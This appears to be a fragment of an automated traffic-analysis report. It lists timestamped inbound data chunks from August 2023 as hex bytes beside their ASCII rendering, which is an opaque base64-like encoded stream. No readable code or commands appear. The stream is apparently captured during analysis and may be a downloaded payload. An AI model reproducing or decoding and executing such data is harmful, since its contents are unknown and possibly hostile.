2023-08-23 17:31:32 UTC	2248	IN	Data Raw: 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 Data Ascii: LOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7w
2023-08-23 17:31:32 UTC	2264	IN	Data Raw: 48 47 68 4c 6b 75 43 32 6c 45 78 72 2b 2b 65 4f 6c 33 50 37 63 49 62 6a 54 44 5a 62 65 32 49 69 31 49 72 38 42 6c 57 52 63 75 63 67 54 49 75 6f 50 56 4e 79 59 71 59 31 74 53 5a 2f 45 57 75 46 52 6f 74 52 74 69 55 75 73 54 56 38 6b 55 63 6b 69 32 76 37 48 79 34 6b 43 34 76 54 69 32 39 42 79 35 62 7a 5a 49 62 63 4a 6a 4f 6f 50 79 62 2b 52 68 74 4c 35 2b 66 32 56 4e 61 30 54 39 30 57 6c 42 44 73 58 78 4f 57 50 6e 4b 47 68 54 38 78 65 4e 76 63 66 49 5a 50 43 4e 46 73 4e 4c 46 62 77 4a 79 42 54 52 78 73 42 4e 30 72 72 42 76 38 65 37 62 49 6e 69 4c 32 2f 44 61 56 4f 4a 62 38 72 4b 73 67 2f 59 54 75 6c 75 61 32 43 79 44 37 7a 4b 2b 63 6c 4a 43 4e 46 49 2f 37 31 4a 2b 63 48 4a 61 32 33 77 48 52 6a 66 49 52 4f 46 50 49 48 79 77 6f 6c 77 66 46 58 56 75 62 32 39 76 Data Ascii: HGhLkuC2lExr++eOl3P7cIbjTDZbe2Ii1Ir8BlWRcucgTIuoPVNyYqY1tSZ/EWuFRotRtiUusTV8kUcki2v7Hy4kC4vTi29By5bzZIbcJjOoPyb+RhtL5+f2VNa0T90WlBDsXxOWPnKGhT8xeNvcfIZPCNFsNLFbwJyBTRxsBN0rrBv8e7bIniL2/DaVOJb8rKsg/YTulua2CyD7zK+clJCNFI/71J+cHJa23wHRjfIROFPIHywolwfFXVub29v
2023-08-23 17:31:32 UTC	2280	IN	Data Raw: 41 65 38 77 4e 66 4e 41 58 36 2b 34 41 56 78 78 4f 2b 58 78 72 6a 4d 72 31 38 46 39 64 74 47 72 69 38 76 79 37 78 79 78 58 45 4c 67 42 4a 63 45 62 47 62 73 31 73 70 46 72 2f 52 69 67 4a 53 51 31 2b 49 6c 34 59 75 2f 55 58 4d 78 6e 61 46 43 48 4a 75 72 78 73 6d 78 53 36 75 72 74 6b 49 52 7a 63 4e 37 70 71 59 63 50 49 57 57 4c 75 6b 36 69 5a 66 53 33 55 5a 42 2f 42 4d 52 78 67 65 57 2b 32 76 32 41 4d 34 75 49 55 59 55 65 32 44 78 6c 4e 52 51 77 62 54 73 6f 63 48 72 5a 70 47 49 67 6b 75 6d 39 65 73 70 78 48 32 79 44 55 46 6b 69 37 47 65 72 69 74 34 66 43 49 56 6b 5a 5a 59 7a 4e 76 6e 74 71 77 6f 2f 2b 78 6d 38 61 68 42 46 66 2b 50 61 52 4f 4f 38 74 33 43 69 2f 45 42 33 45 34 74 45 4f 46 72 54 35 55 2f 32 46 62 56 64 58 74 37 74 62 4c 66 45 39 74 6b 55 66 47 Data Ascii: Ae8wNfNAX6+4AVxxO+XxrjMr18F9dtGri8vy7xyxXELgBJcEbGbs1spFr/RigJSQ1+Il4Yu/UXMxnaFCHJurxsmxS6urtkIRzcN7pqYcPIWWLuk6iZfS3UZB/BMRxgeW+2v2AM4uIUYUe2DxlNRQwbTsocHrZpGIgkum9espxH2yDUFki7Gerit4fCIVkZZYzNvntqwo/+xm8ahBFf+PaROO8t3Ci/EB3E4tEOFrT5U/2FbVdXt7tbLfE9tkUfG
2023-08-23 17:31:32 UTC	2296	IN	Data Raw: 35 68 5a 62 36 39 47 39 58 6b 77 78 5a 4b 4b 66 68 63 56 54 6e 63 78 4a 46 77 76 4c 33 4e 52 37 70 31 76 39 46 47 38 75 5a 44 42 4e 78 70 7a 50 6b 65 58 4d 72 55 49 64 5a 6c 52 37 38 62 69 38 37 51 6b 49 48 68 54 6b 52 4c 57 45 37 4e 7a 62 6b 52 32 55 50 47 7a 50 69 73 30 6c 32 37 78 72 38 77 79 6f 6e 52 6a 6d 47 39 79 56 2b 71 31 55 30 42 6a 47 7a 4f 48 4b 33 54 52 38 35 51 52 59 49 6b 76 55 56 6b 33 62 6c 36 57 4f 69 35 78 32 56 34 51 6f 4c 45 49 4d 78 69 4c 59 63 65 7a 47 5a 6f 47 2f 69 41 46 63 75 4e 48 73 6e 50 4d 7a 62 68 52 72 33 31 7a 63 49 42 76 42 66 37 76 78 39 4b 57 38 6f 62 76 4d 6b 4b 74 75 4b 32 61 52 31 48 77 47 56 68 76 77 61 43 50 72 58 32 6a 6d 6f 64 79 69 44 51 51 32 6d 4c 47 37 32 37 75 39 55 62 58 4c 59 4f 4e 38 68 72 4c 75 51 2f 48 Data Ascii: 5hZb69G9XkwxZKKfhcVTncxJFwvL3NR7p1v9FG8uZDBNxpzPkeXMrUIdZlR78bi87QkIHhTkRLWE7NzbkR2UPGzPis0l27xr8wyonRjmG9yV+q1U0BjGzOHK3TR85QRYIkvUVk3bl6WOi5x2V4QoLEIMxiLYcezGZoG/iAFcuNHsnPMzbhRr31zcIBvBf7vx9KW8obvMkKtuK2aR1HwGVhvwaCPrX2jmodyiDQQ2mLG727u9UbXLYON8hrLuQ/H
2023-08-23 17:31:32 UTC	2312	IN	Data Raw: 4f 32 46 52 75 45 2f 34 34 34 7a 50 53 37 4c 32 2f 52 49 42 72 6d 61 30 53 2f 5a 49 4c 39 75 63 61 79 79 62 39 74 62 63 64 36 7a 38 36 4c 77 52 63 65 66 42 42 39 63 62 4d 52 77 44 70 75 75 47 34 66 35 57 78 51 78 42 75 42 43 72 78 39 7a 32 4b 36 77 42 2f 49 7a 34 33 79 69 6a 65 37 43 63 66 47 6b 63 61 5a 79 6d 69 31 45 32 4c 74 48 56 62 52 48 6f 73 48 75 6f 6e 42 48 59 48 4a 6b 51 6c 37 4d 72 6f 45 6b 57 50 48 61 4d 6d 37 52 62 39 38 77 6d 45 57 38 57 6c 44 79 57 4e 39 43 39 47 48 7a 57 68 77 64 32 36 51 38 35 45 6f 73 77 5a 6c 6b 72 31 6c 78 57 46 6f 31 6d 4a 58 78 79 4b 4e 38 75 38 64 57 6d 63 64 52 58 41 67 78 47 35 6f 59 42 4e 69 30 52 39 4d 61 52 37 4d 48 32 46 55 48 52 39 57 5a 42 52 53 49 47 4b 32 62 52 4f 41 4e 56 31 6b 5a 38 36 32 74 72 35 68 46 Data Ascii: O2FRuE/444zPS7L2/RIBrma0S/ZIL9ucayyb9tbcd6z86LwRcefBB9cbMRwDpuuG4f5WxQxBuBCrx9z2K6wB/Iz43yije7CcfGkcaZymi1E2LtHVbRHosHuonBHYHJkQl7MroEkWPHaMm7Rb98wmEW8WlDyWN9C9GHzWhwd26Q85EoswZlkr1lxWFo1mJXxyKN8u8dWmcdRXAgxG5oYBNi0R9MaR7MH2FUHR9WZBRSIGK2bROANV1kZ862tr5hF
2023-08-23 17:31:32 UTC	2328	IN	Data Raw: 51 42 30 62 34 48 37 32 67 54 7a 68 51 62 2f 73 34 68 59 32 79 2f 48 32 46 35 50 62 6a 30 46 34 52 42 7a 4e 52 64 74 57 45 61 74 77 34 55 77 41 5a 2b 4b 37 6c 69 47 74 4a 68 46 46 48 2b 65 57 78 65 53 4d 72 4b 55 54 72 59 54 6f 6c 31 56 56 50 6d 5a 47 48 4f 78 34 66 75 59 52 53 47 61 66 6e 74 52 62 71 43 54 72 63 59 33 47 6c 6a 74 77 50 46 30 62 65 33 51 4d 67 68 61 4c 72 4b 54 76 66 53 34 47 45 65 79 67 41 67 53 52 48 41 56 37 74 68 47 59 4d 72 79 78 56 63 73 71 45 6a 36 78 76 69 48 6c 57 32 5a 33 49 4f 36 47 65 4c 4d 62 73 59 68 32 43 39 62 6f 35 49 66 67 52 37 46 4c 39 68 6f 47 78 4b 77 72 67 4a 56 73 63 62 5a 39 45 4d 58 4d 52 70 59 63 68 75 48 66 5a 32 4a 72 74 6b 59 67 4d 2f 35 6d 69 2b 68 56 37 4f 62 55 49 48 70 59 4b 41 58 78 49 44 68 7a 51 42 77 Data Ascii: QB0b4H72gTzhQb/s4hY2y/H2F5Pbj0F4RBzNRdtWEatw4UwAZ+K7liGtJhFFH+eWxeSMrKUTrYTol1VVPmZGHOx4fuYRSGafntRbqCTrcY3GljtwPF0be3QMghaLrKTvfS4GEeygAgSRHAV7thGYMryxVcsqEj6xviHlW2Z3IO6GeLMbsYh2C9bo5IfgR7FL9hoGxKwrgJVscbZ9EMXMRpYchuHfZ2JrtkYgM/5mi+hV7ObUIHpYKAXxIDhzQBw
2023-08-23 17:31:32 UTC	2344	IN	Data Raw: 6d 48 61 65 56 70 30 51 75 34 46 4d 31 32 62 37 66 34 79 52 6b 72 46 72 6b 62 57 77 50 74 46 46 41 59 76 41 61 79 4b 57 69 37 46 32 66 51 74 38 7a 41 7a 33 69 38 79 38 58 52 72 57 6e 4e 36 6d 69 34 5a 38 78 6f 5a 6c 58 38 7a 54 75 49 46 6d 53 2b 59 47 50 44 4e 73 54 69 79 62 2b 32 7a 47 4e 67 36 68 57 2f 62 42 68 79 59 32 2f 66 54 6d 68 39 50 68 52 6b 73 39 4a 71 74 76 63 5a 49 63 4c 4b 42 32 2f 47 36 52 61 79 61 52 61 39 61 59 35 70 59 33 32 2b 37 46 41 59 67 44 32 48 38 68 6d 35 62 47 34 68 75 32 52 6f 75 39 56 53 48 72 32 42 61 72 4c 32 49 75 77 4b 79 37 68 72 33 42 33 47 34 52 62 45 59 57 4a 32 76 59 41 53 75 32 50 4e 77 6c 70 72 65 79 53 38 43 6d 58 49 47 72 65 37 77 4c 34 6a 72 32 76 65 61 4d 56 31 46 73 39 66 47 72 63 57 30 66 39 6f 4d 2f 70 33 62 Data Ascii: mHaeVp0Qu4FM12b7f4yRkrFrkbWwPtFFAYvAayKWi7F2fQt8zAz3i8y8XRrWnN6mi4Z8xoZlX8zTuIFmS+YGPDNsTiyb+2zGNg6hW/bBhyY2/fTmh9PhRks9JqtvcZIcLKB2/G6RayaRa9aY5pY32+7FAYgD2H8hm5bG4hu2Rou9VSHr2BarL2IuwKy7hr3B3G4RbEYWJ2vYASu2PNwlpreyS8CmXIGre7wL4jr2veaMV1Fs9fGrcW0f9oM/p3b
2023-08-23 17:31:32 UTC	2360	IN	Data Raw: 4d 6e 38 6c 49 37 73 76 4b 39 79 6a 46 70 4b 66 32 4f 46 63 77 56 74 51 53 48 61 63 66 49 62 31 50 52 64 73 2f 2f 75 6d 6f 59 79 75 7a 70 33 38 6c 72 70 56 75 41 61 39 63 79 7a 57 56 73 75 4e 50 50 47 38 2f 2f 4b 43 4d 61 75 6d 70 68 53 41 2b 48 47 38 49 65 5a 31 66 35 76 35 56 42 41 53 34 6d 48 38 59 42 56 55 45 69 47 68 50 4a 36 6e 6f 76 48 64 38 39 75 72 31 62 61 52 7a 4f 59 52 37 4f 68 6d 73 39 48 38 34 4d 6a 32 7a 48 46 32 57 2b 77 4d 6d 72 48 6c 44 47 4e 6d 6a 51 32 68 37 47 39 63 4d 36 73 2f 35 50 4a 73 38 61 75 63 61 36 67 32 35 49 76 7a 77 62 7a 74 46 6f 66 78 6a 48 31 4c 36 36 5a 59 48 44 2f 64 46 70 6d 51 58 4d 4d 37 4c 79 55 6a 75 50 38 6e 51 69 30 52 64 6e 57 41 75 49 46 39 42 6e 47 57 45 61 79 79 44 51 46 4d 50 39 7a 47 36 2b 77 62 51 45 68 Data Ascii: Mn8lI7svK9yjFpKf2OFcwVtQSHacfIb1PRds//umoYyuzp38lrpVuAa9cyzWVsuNPPG8//KCMaumphSA+HG8IeZ1f5v5VBAS4mH8YBVUEiGhPJ6novHd89ur1baRzOYR7Ohms9H84Mj2zHF2W+wMmrHlDGNmjQ2h7G9cM6s/5PJs8auca6g25IvzwbztFofxjH1L66ZYHD/dFpmQXMM7LyUjuP8nQi0RdnWAuIF9BnGWEayyDQFMP9zG6+wbQEh
2023-08-23 17:31:32 UTC	2376	IN	Data Raw: 6a 65 34 69 6d 38 58 78 73 62 37 2f 38 65 75 73 32 42 79 63 42 76 35 75 61 49 48 37 6d 36 78 72 4c 57 75 73 2b 34 79 73 52 70 65 4f 41 46 48 63 46 73 74 38 50 4a 55 4e 53 35 61 42 61 36 78 67 59 65 57 63 58 52 66 37 2f 76 4d 63 50 50 59 52 50 47 33 50 56 77 75 73 45 58 34 4f 2f 52 61 75 37 35 45 4c 63 4b 65 2f 4d 4d 69 6b 47 31 2f 6e 67 6c 78 6f 4e 68 77 6b 51 68 65 53 57 35 49 49 49 57 55 38 57 35 53 51 62 58 74 76 50 50 57 2b 65 2f 68 6d 75 37 7a 48 75 4e 33 72 66 44 79 56 4f 38 63 73 72 52 76 58 72 59 53 67 36 38 48 4e 41 45 48 55 65 48 2b 63 6d 4a 46 72 2f 4d 68 4e 7a 57 77 4d 6e 48 52 73 36 52 7a 37 61 38 37 4e 68 48 39 63 72 43 4f 6d 2f 55 5a 46 37 4d 61 59 56 5a 69 57 2b 46 76 32 39 4b 2f 33 62 4c 2f 33 6f 55 76 37 37 34 4e 39 2b 50 57 34 35 72 66 Data Ascii: je4im8Xxsb7/8eus2BycBv5uaIH7m6xrLWus+4ysRpeOAFHcFst8PJUNS5aBa6xgYeWcXRf7/vMcPPYRPG3PVwusEX4O/Rau75ELcKe/MMikG1/nglxoNhwkQheSW5IIIWU8W5SQbXtvPPW+e/hmu7zHuN3rfDyVO8csrRvXrYSg68HNAEHUeH+cmJFr/MhNzWwMnHRs6Rz7a87NhH9crCOm/UZF7MaYVZiW+Fv29K/3bL/3oUv774N9+PW45rf
2023-08-23 17:31:32 UTC	2392	IN	Data Raw: 55 66 78 66 2b 37 32 42 35 75 54 41 76 4d 34 68 55 2f 43 63 54 75 47 79 76 39 57 74 4a 74 4d 43 46 2b 52 34 72 50 64 73 70 49 46 47 47 38 37 6b 70 5a 59 57 4f 35 30 37 39 59 59 6d 46 46 32 63 56 4b 62 57 74 50 36 63 5a 64 62 47 46 56 45 4c 7a 57 62 63 50 79 7a 64 67 65 47 56 49 4f 7a 65 6c 6b 4e 77 62 43 30 6d 34 36 45 46 33 53 63 44 46 74 68 6b 54 4f 5a 64 38 36 76 32 58 53 4a 4e 46 6a 37 55 57 36 49 4f 74 58 79 57 54 63 55 4d 5a 70 35 4c 57 35 47 39 6e 4b 79 6d 2f 6a 30 37 39 6b 67 76 78 4d 54 53 41 62 76 4d 6e 41 59 53 42 51 7a 4d 57 35 76 6c 61 42 62 4c 33 51 73 31 78 6c 30 62 31 62 62 52 66 4f 75 62 6a 37 46 56 78 38 62 2f 4a 41 49 47 49 48 7a 6e 39 45 54 57 67 61 79 4d 44 44 2f 78 4e 4e 68 6d 76 4c 75 6c 6e 39 32 4e 63 64 78 75 58 47 30 4c 34 68 34 Data Ascii: Ufxf+72B5uTAvM4hU/CcTuGyv9WtJtMCF+R4rPdspIFGG87kpZYWO5079YYmFF2cVKbWtP6cZdbGFVELzWbcPyzdgeGVIOzelkNwbC0m46EF3ScDFthkTOZd86v2XSJNFj7UW6IOtXyWTcUMZp5LW5G9nKym/j079kgvxMTSAbvMnAYSBQzMW5vlaBbL3Qs1xl0b1bbRfOubj7FVx8b/JAIGIHzn9ETWgayMDD/xNNhmvLuln92NcdxuXG0L4h4
2023-08-23 17:31:32 UTC	2408	IN	Data Raw: 6e 4b 65 2f 2f 53 30 66 58 4a 76 32 4f 76 35 76 66 46 43 72 72 39 53 45 55 53 57 39 73 59 52 59 4a 7a 65 49 65 52 68 58 70 37 6a 38 6d 36 69 37 54 6c 32 4c 32 39 76 36 73 75 36 75 41 67 77 77 4c 4a 47 73 4d 48 45 38 6d 2f 74 39 6a 56 53 4d 44 4e 68 59 68 52 57 2f 36 35 75 37 67 6e 37 56 44 4b 79 72 66 42 69 62 73 50 79 37 6e 48 75 73 42 70 37 57 4e 66 53 57 45 57 38 2b 78 6f 2b 51 2f 75 75 6c 64 50 7a 4d 44 50 52 4e 53 33 41 78 4e 56 48 43 46 49 39 4c 74 43 78 57 6c 6f 78 68 30 59 7a 49 49 65 30 47 30 64 54 46 66 44 36 68 76 71 59 6c 52 32 65 62 36 34 67 2f 6e 46 69 68 62 50 74 72 32 67 32 45 68 42 44 38 31 45 54 37 67 2b 2f 42 6c 4f 68 51 78 63 44 50 61 2f 78 34 6c 50 35 6c 61 35 49 61 4d 66 42 30 33 51 44 46 4e 47 57 64 4e 6d 56 4f 76 4f 75 53 62 5a 4e Data Ascii: nKe//S0fXJv2Ov5vfFCrr9SEUSW9sYRYJzeIeRhXp7j8m6i7Tl2L29v6su6uAgwwLJGsMHE8m/t9jVSMDNhYhRW/65u7gn7VDKyrfBibsPy7nHusBp7WNfSWEW8+xo+Q/uuldPzMDPRNS3AxNVHCFI9LtCxWloxh0YzIIe0G0dTFfD6hvqYlR2eb64g/nFihbPtr2g2EhBD81ET7g+/BlOhQxcDPa/x4lP5la5IaMfB03QDFNGWdNmVOvOuSbZN
2023-08-23 17:31:32 UTC	2424	IN	Data Raw: 69 6c 55 49 30 67 68 79 35 46 41 6f 34 6b 75 53 4a 31 58 4d 6f 55 68 6b 58 48 30 63 77 45 48 6c 56 79 59 37 2f 43 76 4d 31 6c 75 32 57 42 6f 55 58 4d 59 34 38 78 54 76 36 2b 4e 72 68 71 65 46 43 7a 4e 34 52 49 76 37 36 2f 6d 32 46 4b 65 52 7a 41 75 38 7a 43 5a 4c 70 70 67 71 5a 63 75 32 2b 45 50 56 50 2f 79 43 58 74 59 6e 68 43 35 79 6d 4a 51 73 66 47 79 33 4e 73 53 33 4e 76 77 62 2f 47 79 47 54 43 48 4a 47 57 57 37 5a 73 6a 44 4a 44 44 38 38 36 31 43 42 2f 53 39 47 41 58 4d 6d 37 78 6d 30 54 54 4f 4a 75 51 4e 30 67 48 72 2b 2b 76 2b 70 68 53 6e 6b 63 64 69 2f 52 37 73 36 35 75 4d 52 6b 74 6d 68 39 71 6c 42 7a 62 6f 41 39 45 67 65 47 4c 2b 6c 6c 69 55 4c 73 61 6e 64 49 77 4d 76 42 74 57 70 65 6b 42 50 4f 30 63 6e 50 48 72 64 72 67 61 4a 62 7a 53 42 2b 4d Data Ascii: ilUI0ghy5FAo4kuSJ1XMoUhkXH0cwEHlVyY7/CvM1lu2WBoUXMY48xTv6+NrhqeFCzN4RIv76/m2FKeRzAu8zCZLppgqZcu2+EPVP/yCXtYnhC5ymJQsfGy3NsS3Nvwb/GyGTCHJGWW7ZsjDJDD8861CB/S9GAXMm7xm0TTOJuQN0gHr++v+phSnkcdi/R7s65uMRktmh9qlBzboA9EgeGL+lliULsandIwMvBtWpekBPO0cnPHrdrgaJbzSB+M
2023-08-23 17:31:32 UTC	2440	IN	Data Raw: 38 56 45 4d 72 4f 61 56 4f 35 48 73 61 2f 68 6d 76 51 47 63 77 6b 72 78 48 79 79 32 48 52 74 72 49 38 2f 72 71 38 52 57 68 32 75 73 59 47 48 73 6a 43 79 59 44 69 78 78 76 6f 78 2f 2f 4a 2f 58 54 4c 75 72 36 71 32 4d 54 38 69 67 44 6a 46 41 59 4c 6c 4a 32 6f 75 6e 71 32 46 47 48 4d 2b 42 32 7a 46 69 44 4f 5a 47 48 47 47 6b 72 4f 6b 61 75 6f 6c 4d 5a 68 5a 63 59 69 47 73 4e 76 61 4d 34 61 57 38 66 49 50 48 37 6b 78 4a 46 77 64 44 68 57 58 51 6d 36 46 78 4c 41 68 57 44 6b 49 6c 37 4c 43 68 76 47 5a 6b 57 30 71 69 4c 57 66 72 36 4a 54 46 4c 57 77 64 43 35 77 6a 66 59 78 52 5a 47 7a 67 35 43 30 33 34 35 7a 2f 53 47 62 6c 71 37 78 73 61 58 34 73 35 6e 55 4e 45 44 4a 50 6e 49 62 79 72 79 6a 47 7a 4f 76 37 51 70 37 51 51 41 74 73 55 54 76 77 48 44 49 63 62 30 61 Data Ascii: 8VEMrOaVO5Hsa/hmvQGcwkrxHyy2HRtrI8/rq8RWh2usYGHsjCyYDixxvox//J/XTLur6q2MT8igDjFAYLlJ2ounq2FGHM+B2zFiDOZGHGGkrOkauolMZhZcYiGsNvaM4aW8fIPH7kxJFwdDhWXQm6FxLAhWDkIl7LChvGZkW0qiLWfr6JTFLWwdC5wjfYxRZGzg5C0345z/SGblq7xsaX4s5nUNEDJPnIbyryjGzOv7Qp7QQAtsUTvwHDIcb0a
2023-08-23 17:31:32 UTC	2456	IN	Data Raw: 51 71 77 76 34 2f 50 44 48 2f 5a 62 37 41 79 64 7a 6f 77 6f 49 63 74 72 7a 4d 30 4f 30 35 4d 67 2b 34 51 6a 51 2b 42 4d 78 65 4b 62 72 4a 75 73 59 6b 53 69 33 4f 7a 73 65 35 79 52 69 2f 76 72 33 52 46 45 64 6b 79 57 4d 30 4d 52 41 54 54 55 39 63 56 46 6e 59 62 59 37 4f 75 6c 6c 50 69 68 70 64 41 50 50 36 68 79 37 47 37 46 76 4f 79 63 30 6a 30 6e 5a 6b 35 68 74 53 78 41 76 4a 75 47 47 38 74 74 44 46 30 39 51 61 75 4c 7a 62 7a 2f 48 51 62 32 68 35 47 37 55 65 6c 4c 57 4b 50 59 59 66 64 44 6e 4f 63 64 59 6f 4a 44 56 75 59 75 66 79 31 44 70 68 62 4d 42 72 78 34 35 77 73 32 4e 4a 30 62 32 39 50 63 5a 53 49 4d 77 67 52 43 6c 2f 47 6f 30 53 46 54 6f 38 58 57 61 38 48 32 52 59 4a 51 51 57 52 78 53 35 75 31 67 73 4a 36 63 61 37 77 47 36 7a 32 7a 52 58 32 76 43 46 Data Ascii: Qqwv4/PDH/Zb7AydzowoIctrzM0O05Mg+4QjQ+BMxeKbrJusYkSi3Ozse5yRi/vr3RFEdkyWM0MRATTU9cVFnYbY7OullPihpdAPP6hy7G7FvOyc0j0nZk5htSxAvJuGG8ttDF09QauLzbz/HQb2h5G7UelLWKPYYfdDnOcdYoJDVuYufy1DphbMBrx45ws2NJ0b29PcZSIMwgRCl/Go0SFTo8XWa8H2RYJQQWRxS5u1gsJ6ca7wG6z2zRX2vCF
2023-08-23 17:31:32 UTC	2472	IN	Data Raw: 4f 52 37 6e 4a 6b 54 6c 66 69 47 46 73 75 2b 72 76 4c 78 64 41 4c 59 55 4f 2f 62 72 69 42 48 37 35 6f 76 62 2f 73 31 2b 71 44 49 46 39 65 36 69 42 43 4a 67 7a 4a 77 4d 75 37 5a 47 70 65 76 78 4d 7a 43 4e 51 65 74 72 79 32 44 78 70 62 79 37 68 6a 73 76 77 69 77 43 46 57 41 68 37 42 62 31 34 39 5a 42 52 53 4c 6d 31 76 75 73 61 2f 68 6a 39 30 61 7a 77 38 41 32 57 2b 35 49 54 52 74 72 64 7a 49 35 5a 6d 73 79 38 75 42 33 73 38 4c 76 30 63 62 2b 73 69 75 6d 4e 4c 4a 51 73 5a 78 4e 65 4b 74 45 77 2b 42 59 68 6f 35 68 35 56 4c 50 78 68 4a 7a 77 41 5a 78 49 79 2b 6d 63 77 50 6d 6b 5a 59 43 59 69 47 37 50 74 4d 53 5a 6f 47 45 55 6e 45 32 4c 50 69 57 43 31 7a 4a 46 4b 49 43 34 53 5a 45 59 6e 61 62 6b 39 4b 57 47 39 55 44 39 74 46 6c 56 78 46 42 62 49 77 73 2b 2b 48 Data Ascii: OR7nJkTlfiGFsu+rvLxdALYUO/briBH75ovb/s1+qDIF9e6iBCJgzJwMu7ZGpevxMzCNQetry2Dxpby7hjsvwiwCFWAh7Bb149ZBRSLm1vusa/hj90azw8A2W+5ITRtrdzI5Zmsy8uB3s8Lv0cb+siumNLJQsZxNeKtEw+BYho5h5VLPxhJzwAZxIy+mcwPmkZYCYiG7PtMSZoGEUnE2LPiWC1zJFKIC4SZEYnabk9KWG9UD9tFlVxFBbIws++H
2023-08-23 17:31:32 UTC	2488	IN	Data Raw: 68 4c 52 65 59 62 51 69 74 73 48 48 58 2f 74 4e 42 76 79 50 37 45 73 32 61 35 2f 62 72 41 48 4c 38 67 48 6c 43 33 48 65 30 43 68 54 58 50 52 54 4d 69 6b 4c 6c 6b 76 64 43 33 49 47 64 51 66 33 42 59 58 73 36 35 36 46 37 78 65 57 5a 4c 56 4e 68 6f 55 54 78 73 48 73 4c 4f 78 61 7a 75 77 4d 50 49 41 33 6e 4d 38 6f 74 75 52 6b 4f 2f 78 6f 71 74 35 6c 5a 58 56 45 45 54 5a 4d 57 37 79 33 35 69 57 37 39 71 49 7a 48 38 48 72 72 4a 75 6f 5a 71 53 4d 70 64 4c 68 42 68 75 73 61 2b 64 58 42 4f 30 53 4c 41 7a 72 37 76 49 42 4c 53 59 6b 36 35 47 37 70 61 50 32 32 49 34 32 68 47 56 31 50 4f 34 68 69 52 78 37 2f 45 33 34 49 68 57 51 37 38 43 72 72 42 76 31 52 2f 7a 4f 56 46 6a 47 47 37 75 53 6b 43 30 31 70 54 74 37 76 41 7a 69 4e 2f 74 6c 56 78 61 57 56 4a 50 56 49 61 53 Data Ascii: hLReYbQitsHHX/tNBvyP7Es2a5/brAHL8gHlC3He0ChTXPRTMikLlkvdC3IGdQf3BYXs656F7xeWZLVNhoUTxsHsLOxazuwMPIA3nM8otuRkO/xoqt5lZXVEETZMW7y35iW79qIzH8HrrJuoZqSMpdLhBhusa+dXBO0SLAzr7vIBLSYk65G7paP22I42hGV1PO4hiRx7/E34IhWQ78CrrBv1R/zOVFjGG7uSkC01pTt7vAziN/tlVxaWVJPVIaS
2023-08-23 17:31:32 UTC	2504	IN	Data Raw: 59 59 55 79 37 36 75 31 50 66 45 31 45 31 2f 68 74 44 54 30 35 65 6a 51 7a 66 59 76 36 49 4f 63 35 54 49 73 38 63 49 4d 2f 74 2f 73 6d 2f 7a 50 36 46 75 7a 2f 4a 4f 78 76 4c 47 73 73 74 62 31 58 35 68 57 31 58 56 37 69 38 76 78 48 78 78 47 39 67 48 74 48 31 48 72 4d 51 7a 56 6a 5a 48 39 45 66 48 6a 54 34 6e 63 38 36 48 53 50 6c 77 4c 76 4d 43 48 6e 42 38 6f 4d 56 73 6f 42 74 79 74 48 47 67 74 68 65 78 32 55 55 76 47 30 66 75 43 43 2f 58 78 57 38 59 73 66 30 75 6b 56 4a 55 75 73 54 56 34 58 2b 31 47 63 47 77 42 39 63 46 4e 41 66 5a 62 68 6d 79 4d 6b 62 67 46 7a 52 49 42 35 64 37 63 33 52 30 51 6d 52 74 51 4f 2b 74 43 63 68 79 31 46 69 30 2f 6d 2b 53 79 51 69 31 51 47 44 46 62 4b 41 62 63 72 52 78 37 58 59 73 6c 30 67 58 6b 4a 74 47 37 4d 4b 79 44 76 69 79 Data Ascii: YYUy76u1PfE1E1/htDT05ejQzfYv6IOc5TIs8cIM/t/sm/zP6Fuz/JOxvLGsstb1X5hW1XV7i8vxHxxG9gHtH1HrMQzVjZH9EfHjT4nc86HSPlwLvMCHnB8oMVsoBtytHGgthex2UUvG0fuCC/XxW8Ysf0ukVJUusTV4X+1GcGwB9cFNAfZbhmyMkbgFzRIB5d7c3R0QmRtQO+tCchy1Fi0/m+SyQi1QGDFbKAbcrRx7XYsl0gXkJtG7MKyDviy
2023-08-23 17:31:32 UTC	2520	IN	Data Raw: 6f 65 56 64 71 41 61 62 77 4c 33 44 6e 42 61 37 64 38 62 4d 6e 4b 55 69 4c 53 58 6b 6d 45 76 46 46 4a 4c 6d 77 66 52 66 35 4a 50 55 6f 6f 32 42 64 4b 57 79 34 56 5a 49 52 41 37 6d 78 42 4b 51 78 6f 51 33 38 6f 58 58 46 4f 59 72 67 7a 7a 69 35 59 46 46 38 39 4b 50 6f 65 56 6c 47 30 4d 53 4a 6c 53 30 6d 43 2b 66 37 2b 53 42 71 2f 74 32 75 37 68 57 2f 43 62 57 75 38 76 32 33 38 34 38 46 66 5a 74 66 41 51 74 53 47 51 63 6f 49 74 79 77 6c 48 72 64 42 5a 56 64 50 36 47 4a 58 66 41 72 75 48 2f 34 47 54 56 4c 36 77 66 4a 39 49 63 36 36 32 62 6e 6d 48 57 30 55 32 68 70 46 2b 59 51 54 57 39 48 47 30 6a 6a 53 61 42 4e 6b 33 78 31 59 4c 78 43 51 59 37 75 35 30 2f 72 54 46 32 56 70 4f 50 62 50 47 37 6c 70 58 55 54 46 73 79 6c 72 79 63 33 52 57 58 33 30 